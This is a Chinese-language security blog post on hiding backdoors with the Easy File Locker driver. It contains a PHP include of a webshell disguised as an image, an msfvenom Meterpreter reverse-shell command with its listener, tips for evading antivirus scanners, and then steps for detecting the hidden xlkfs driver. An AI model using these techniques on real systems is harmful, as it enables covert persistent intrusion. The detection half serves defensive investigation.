我会肾透——利用驱动隐藏后门

简单介绍:

驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker 下载链接: http://www.xoslab.com/efl.html

一般做黑链的小朋友都会这样设置:只勾选可读,其他的一律拒绝……那么,会有这样的效果,该文件不会显示,不能通过列目录列出来,也不能删除,除非你知道完整路径,你才可以读取文件内容。

并且该软件还可以设置密码,启动、修改设置、卸载及重复安装的时候都需要密码,更蛋疼的是,主界面、卸载程序等都可以删除,只留下核心的驱动文件就行了。

php后门测试:

先写一个用于包含的文件test.php,用于包含shell文件1111.jpg
在这里插入图片描述
再写一个shell文件,里面是一句话木马
在这里插入图片描述
添加需要隐藏的文件,如1111.jpg

4个选项,选中的分别为可访问、可读写、可删除,未选的为可视化(隐藏)
在这里插入图片描述
之后发现文件目录下的1111.jpg消失了,即使是打开显示所有的隐藏文件,都无法看到
在这里插入图片描述
在这里插入图片描述
访问测试,shell运行成功
在这里插入图片描述

使用工具进行后门排查:

使用安全狗进行网站安全扫描,未发现shell文件1111.jpg,并且判断test.php无危害
在这里插入图片描述

D盾_webshell查杀工具扫描,未发现shell文件
在这里插入图片描述

上火绒,360安全卫士依然未发现

当然,日志中记录了相关的访问记录,例如使用360星图分析apache日志,就能发现一些痕迹
在这里插入图片描述

备注:

对php后门进行了一些测试,最好是使用包含,直接隐藏php文件不可解析(推测是动态语言受限制,html文件可以解析),无法配合ADS隐藏文件进行使用。

关于工具爆出的可疑脚本test.php 可以在包含脚本test.php里面使用16进制编码以及各种嵌套来迷惑开发人员,当然还有各种配合使用的隐藏方法,就看你有多少想象力了

exe后门测试:

使用msf写一个反弹shell的后门:

`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f  exe -o  /root/shell.exe`

在这里插入图片描述

msf中设置监听

use exploit/multi/handler

在这里插入图片描述

上线成功

在这里插入图片描述

对shell.exe文件使用工具进行隐藏,不影响后门的上线
在这里插入图片描述

后门排查:

可以看到,虽然shell文件被隐藏,但是进程还在
在这里插入图片描述

命令:wmic

然后输入:process

依然可以看到进程文件位置
在这里插入图片描述

上火绒扫描,直接干掉
在这里插入图片描述

排查思路:

当我们发现了后门文件的痕迹,但是无法找到文件时,就可以猜测,是否是使用了驱动觐见隐藏

这些是典型特征

c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys

使用everything搜索,发现存在特征
在这里插入图片描述

命令tasklist与services.msc查看进程与服务时,查不到该进程和服务
在这里插入图片描述

使用D盾_webshell工具检测进程无发现

上火绒🗡,进程无发现,但是在驱动中发现了xlkfs
在这里插入图片描述

也可以使用sc进行查询

SC命令,是用来与服务控制管理器和服务进行通信的命令行程序。

sc query xlkfs //query-----------查询服务的状态
在这里插入图片描述
sc qc xlkfs 查询服务配置信息
在这里插入图片描述
在注册表中检查服务

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
在这里插入图片描述
命令net stop xlkfs 停止服务

隐藏的文件显示出来
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值